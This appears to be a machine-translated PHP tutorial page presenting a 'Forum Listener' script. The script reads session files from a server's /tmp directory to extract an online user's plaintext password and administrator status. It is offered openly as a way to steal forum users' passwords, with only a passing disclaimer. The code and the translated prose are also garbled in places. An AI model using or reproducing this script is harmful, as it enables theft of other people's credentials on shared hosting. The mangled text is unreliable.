PHP View Session content function _php Tutorial

such as: name|s:4: "Tasm";p asswd|s:6: "111111", Mode|s:1: "1", also know the location of the session storage, and can upload files, so, then did a small hacker, online friend's password can be unobstructed, Oh:
function Submit1 () {
Global $username;
Print " <title>Forum Listener</title>";
$i = 0;
if ($username = = "Tasm" | | $username = = "Tasm")
{
Print "Are you too dark?" Even me, you check it? ";
Return
}
$path = "/tmp/";
$d = Dir ($path);
while ($entry = $d->read ()) {
if (substr ($entry, 0,4) = = "Sess") {
$entry = $path. $entry;
$ary = @file ($entry);
if (!empty ($ary [0])) {
$ary = Explode (";", $ary [0]);
$name = Explode (":", $ary [0]);
if ($name [2]== "\" "". $username. " \""){
$passwd = Explode (":", $ary [1]);
$mode =explode (":", $ary [3]);
Print "user pseudonym:". $name [2]. "
Use password: ". $passwd [2]."
Usage mode: ";
if ($mode [1]==1)
print "Administrator";
Else
Print "General user";
Print

Stealing someone's password is unethical, so less.
";
$i = 1;
Break
}}}}
if (! $i)
Print "User:". $username. " Is it really online? If you are sure, please do it again, do not make more space! ";
$d->close ();
}

function Login () {
?>


<title>Forum Listener</title>

Forum Listener

When you see a user online, you want to see his password, how do you do it?

Let me tell you this: just use this program.

Solemnly declare: This procedure for free procedure, by it caused by any loss I cover is not responsible. However, this problem may soon be blocked, single-digit or do not advertise the use of it.

}
--------------Main ()
if ($submit 1)
Submit1 ();
Else
Login ();
?>

http://www.bkjia.com/PHPjc/319459.html www.bkjia.com true http://www.bkjia.com/PHPjc/319459.html techarticle such as: name|s:4: "Tasm";p asswd|s:6: "111111", Mode|s:1: "1", also know the location of the session storage, and can upload files, so, then did a little hack, online friends ...

